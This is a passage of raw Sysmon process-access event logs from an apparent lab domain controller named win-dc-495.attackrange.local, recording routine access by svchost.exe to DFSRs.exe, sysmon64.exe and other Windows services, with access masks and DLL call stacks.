13:34:16.689{59A5CD1D-8E46-6005-1600-00000000A301}15442092C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+261b7|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001791Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.689{59A5CD1D-8E46-6005-1600-00000000A301}15442092C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+25d35|C:\Windows\system32\wbem\wmiprvsd.dll+2619d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000001790Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.689{59A5CD1D-8E46-6005-1600-00000000A301}15442092C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2a2f2|C:\Windows\system32\wbem\wmiprvsd.dll+29e26|C:\Windows\system32\wbem\wmiprvsd.dll+28432|C:\Windows\system32\wbem\wmiprvsd.dll+281af|C:\Windows\system32\wbem\wmiprvsd.dll+2982c|C:\Windows\system32\wbem\wmiprvsd.dll+292fb|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x80000000000000001789Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.689{59A5CD1D-8E46-6005-1600-00000000A301}15442092C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2597b|C:\Windows\system32\wbem\wmiprvsd.dll+283dc|C:\Windows\system32\wbem\wmiprvsd.dll+281af|C:\Windows\system32\wbem\wmiprvsd.dll+2982c|C:\Windows\system32\wbem\wmiprvsd.dll+292fb|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001788Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.689{59A5CD1D-8E46-6005-1600-00000000A301}15442092C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+5a1b8|C:\Windows\system32\wbem\wmiprvsd.dll+35a49|C:\Windows\system32\wbem\wmiprvsd.dll+2807f|C:\Windows\system32\wbem\wmiprvsd.dll+29591|C:\Windows\system32\wbem\wmiprvsd.dll+292c2|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001787Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.689{59A5CD1D-8E46-6005-1600-00000000A301}15442092C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+264a1|C:\Windows\system32\wbem\wmiprvsd.dll+2669f|C:\Windows\system32\wbem\wmiprvsd.dll+25c4b|C:\Windows\system32\wbem\wmiprvsd.dll+27476|C:\Windows\system32\wbem\wmiprvsd.dll+27db2|C:\Windows\system32\wbem\wmiprvsd.dll+277c9|C:\Windows\system32\wbem\wmiprvsd.dll+26100|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x80000000000000001786Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.689{59A5CD1D-8E56-6005-2F00-00000000A301}22762616C:\Windows\system32\DFSRs.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmidcprv.dll+163a4|C:\Windows\system32\wbem\wmidcprv.dll+166e0|C:\Windows\system32\wbem\wmidcprv.dll+abad|C:\Windows\system32\wbem\wmidcprv.dll+b57e|C:\Windows\system32\DFSRs.exe+d847d|C:\Windows\system32\DFSRs.exe+c3ca|C:\Windows\system32\DFSRs.exe+51c1|C:\Windows\system32\DFSRs.exe+73b2|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001785Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.689{59A5CD1D-8E46-6005-1600-00000000A301}15442092C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+261b7|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001784Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.689{59A5CD1D-8E46-6005-1600-00000000A301}15442092C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+25d35|C:\Windows\system32\wbem\wmiprvsd.dll+2619d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000001783Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.689{59A5CD1D-8E46-6005-1600-00000000A301}15442092C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2a2f2|C:\Windows\system32\wbem\wmiprvsd.dll+29e26|C:\Windows\system32\wbem\wmiprvsd.dll+28432|C:\Windows\system32\wbem\wmiprvsd.dll+281af|C:\Windows\system32\wbem\wmiprvsd.dll+2982c|C:\Windows\system32\wbem\wmiprvsd.dll+292fb|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x80000000000000001782Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.689{59A5CD1D-8E46-6005-1600-00000000A301}15442092C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2597b|C:\Windows\system32\wbem\wmiprvsd.dll+283dc|C:\Windows\system32\wbem\wmiprvsd.dll+281af|C:\Windows\system32\wbem\wmiprvsd.dll+2982c|C:\Windows\system32\wbem\wmiprvsd.dll+292fb|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001781Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.689{59A5CD1D-8E46-6005-1600-00000000A301}15442092C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+5a1b8|C:\Windows\system32\wbem\wmiprvsd.dll+35a49|C:\Windows\system32\wbem\wmiprvsd.dll+2807f|C:\Windows\system32\wbem\wmiprvsd.dll+29591|C:\Windows\system32\wbem\wmiprvsd.dll+292c2|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001780Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.673{59A5CD1D-8E56-6005-2F00-00000000A301}22762616C:\Windows\system32\DFSRs.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmidcprv.dll+163a4|C:\Windows\system32\wbem\wmidcprv.dll+166e0|C:\Windows\system32\wbem\wmidcprv.dll+abad|C:\Windows\system32\wbem\wmidcprv.dll+b57e|C:\Windows\system32\DFSRs.exe+d847d|C:\Windows\system32\DFSRs.exe+c1bd|C:\Windows\system32\DFSRs.exe+51c1|C:\Windows\system32\DFSRs.exe+73b2|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001779Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.611{59A5CD1D-8E58-6005-4000-00000000A301}37843812C:\Windows\system32\wbem\wmiprvse.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\combase.dll+a8a02|C:\Windows\System32\combase.dll+a972e|C:\Windows\System32\combase.dll+a953f|C:\Windows\System32\combase.dll+45458|C:\Windows\System32\combase.dll+45070|C:\Windows\System32\combase.dll+520a7|C:\Windows\System32\combase.dll+c2274|C:\Windows\System32\combase.dll+4f0e1|C:\Windows\System32\combase.dll+508c0|C:\Windows\System32\combase.dll+21ba|C:\Windows\System32\RPCRT4.dll+d97da|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000001778Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.501{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E58-6005-4300-00000000A301}3860C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001777Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.501{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001776Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.501{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001775Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.501{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001774Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.501{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001773Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.501{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001772Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.501{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001771Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.501{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001770Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.501{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL